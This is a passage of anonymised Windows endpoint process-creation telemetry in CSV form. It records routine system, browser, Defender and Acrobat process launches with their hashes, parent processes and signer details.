20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102296,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+1290,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:52:35.005014200+00:00,12800,SystemSettings.exe,"""SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",PortableExecutable,2021-06-09 01:21:17.274789100+00:00,C:\Windows\ImmersiveControlPanel\SystemSettings.exe,97056,492494461fad3508358de1ac7b55190c,242f6e2b27a972efbcca6782bb784f80a99e4b317062eb7286bf344bc65c64e1,873a59d217f0b2b25dfdfd0e4244c9fa250340d0,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:52:35.064755+00:00,2021-06-23 00:52:50.769471100+00:00,b8a0194c-c5ab-4c95-bb17-305a1623a630,computerpii_0a470890c60768167990033d701e7bd881398861,155187,False,10.7740.19041.1052,False,11540474045136908,,11540474045171901,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,Settings,SystemSettings.exe,Settings
+1291,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:52:35.006357100+00:00,2456,ApplicationFrameHost.exe,ApplicationFrameHost.exe -Embedding,PortableExecutable,2021-02-17 04:35:02.434563400+00:00,C:\Windows\System32\ApplicationFrameHost.exe,78456,d58a8a987a8dafad9dc32a548cc061e7,cf58e424b86775e6f2354291052126a646f842fff811b730714dfbbd8ebc71a4,f79fc9e0ab066cad530b949c2153c532a5223156,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:52:35.065444100+00:00,2021-06-23 00:52:50.769499700+00:00,36300114-51ab-4849-8fe1-a80ed593480e,computerpii_0a470890c60768167990033d701e7bd881398861,155188,False,10.7740.19041.1052,False,11540474045136908,,11540474045171902,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,Application Frame Host,ApplicationFrameHost.exe,Application Frame Host
+1292,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:30:41.045367800+00:00,17972,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7116 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:30:41.293716100+00:00,2021-06-23 02:32:47.724478300+00:00,aff96fe2-d142-4401-a3b7-e6bef71bbdb2,computerpii_0a470890c60768167990033d701e7bd881398861,159804,False,10.7740.19041.1052,False,11540474045171838,,11540474045172753,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1293,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:54:31.260203+00:00,6256,WUDFHost.exe,"""WUDFHost.exe"" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-0273686f-a5f8-421f-ba8a-00a5f9575aea -SystemEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-902c8e5a-4b32-4b08-9f9c-ed84102275ec -IoCancelEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-2213a274-bf80-45ae-ab68-9fd11b1889b2 -NonStateChangingEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-cca025eb-e40d-41b9-b20a-9b3aacb107d7 -LifetimeId:07235ed8-5890-4484-901a-28396346d192 -DeviceGroupId:WpdFsGroup -HostArg:0",PortableExecutable,2019-12-07 09:08:58.801551200+00:00,C:\Windows\System32\WUDFHost.exe,271872,8e3f4f1d20179db86caf4c7e110dfc18,e6f5de8bc3fc572d9a2866024c5af3a83a4d70f4d38810b9e7679a2e9f89775c,2367c318c59a945dc0c07a9c879c81f2f870e08c,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:54:31.328245900+00:00,2021-06-25 01:56:15.385124200+00:00,19bdf576-e313-441b-b87f-1d907a0a52b3,computerpii_0a470890c60768167990033d701e7bd881398861,184434,False,10.7740.19041.1052,False,11540474045136906,,11540474045178897,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,WUDFHost.exe,WUDFHost.exe,Windows Driver Foundation - User-mode Driver Framework Host Process
+1294,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:54:31.346550300+00:00,6112,BdeUISrv.exe,BdeUISrv.exe -Embedding,PortableExecutable,2021-02-17 04:36:09.549669600+00:00,C:\Windows\System32\BdeUISrv.exe,55808,6836ed50c16fcac0449cfc97aa73bfcb,a3efbfcc54263b42557f5d4c0e6e6420aa5d7128c5050af135ba5e703a9f7640,24f12cf01f2aef2ec3041278811f975cb97f385b,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:54:31.443364900+00:00,2021-06-25 01:56:15.385193100+00:00,00a0bef4-bfdb-4d92-bf04-d9746cea8346,computerpii_0a470890c60768167990033d701e7bd881398861,184436,False,10.7740.19041.1052,False,11540474045136908,,11540474045178898,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,BDEUISRV.DLL,BDEUISRV.DLL,BDE UI Launcher
+1295,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:54:38.245418600+00:00,1704,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6160 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:54:38.273520100+00:00,2021-06-25 01:56:15.385464200+00:00,34dda255-c125-476d-bb47-3812853f1c17,computerpii_0a470890c60768167990033d701e7bd881398861,184444,False,10.7740.19041.1052,False,11540474045178212,,11540474045178901,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1296,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:39:38.588127300+00:00,3084,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey CBB01C62-A4AD-E197-9429-BEA6447BF602 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:39:39.120749700+00:00,2021-06-24 03:40:44.532478400+00:00,ea09b413-92a7-4100-bb84-a4464425d62e,computerpii_0a470890c60768167990033d701e7bd881398861,174692,False,10.7740.19041.1052,False,11540474045145394,,11540474045176332,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1297,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:20:58.138195800+00:00,12280,SenseCncProxy.exe,3884,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:20:58.641044800+00:00,2021-06-25 01:23:08.451960500+00:00,d1869174-2e4e-4023-a428-1cfdfe539e58,computerpii_0a470890c60768167990033d701e7bd881398861,183261,False,10.7740.19041.1052,False,11540474045137006,,11540474045178726,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1298,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:20:58.610193700+00:00,380,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\POI\FilePII_e63b8003b1f20fa8556a71dd8bad4ba11ad50f3a.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:20:58.644346600+00:00,2021-06-25 01:23:08.451996500+00:00,6a4a85ba-25db-4ca9-9ff1-659e30911e0c,computerpii_0a470890c60768167990033d701e7bd881398861,183262,False,10.7740.19041.1052,False,11540474045178163,,11540474045178727,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+1299,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:21:04.378614800+00:00,11224,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\POI\FilePII_c4c9ffef1b6f4adf79728e4583ff6c70c6b39e66.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:21:04.475055500+00:00,2021-06-25 01:23:08.452651+00:00,ef130ad6-671a-47c2-aa6b-6975ea5531c6,computerpii_0a470890c60768167990033d701e7bd881398861,183280,False,10.7740.19041.1052,False,11540474045178163,,11540474045178728,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+1300,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:22:14.546046800+00:00,12812,svchost.exe,svchost.exe -k LocalServiceNetworkRestricted -p -s SmsRouter,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:22:14.553177400+00:00,2021-06-24 09:22:38.671996100+00:00,62dc757e-1584-45ba-b323-6eba8d955a72,computerpii_0a470890c60768167990033d701e7bd881398861,178208,False,10.7740.19041.1052,False,11540474045136906,,11540474045177587,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
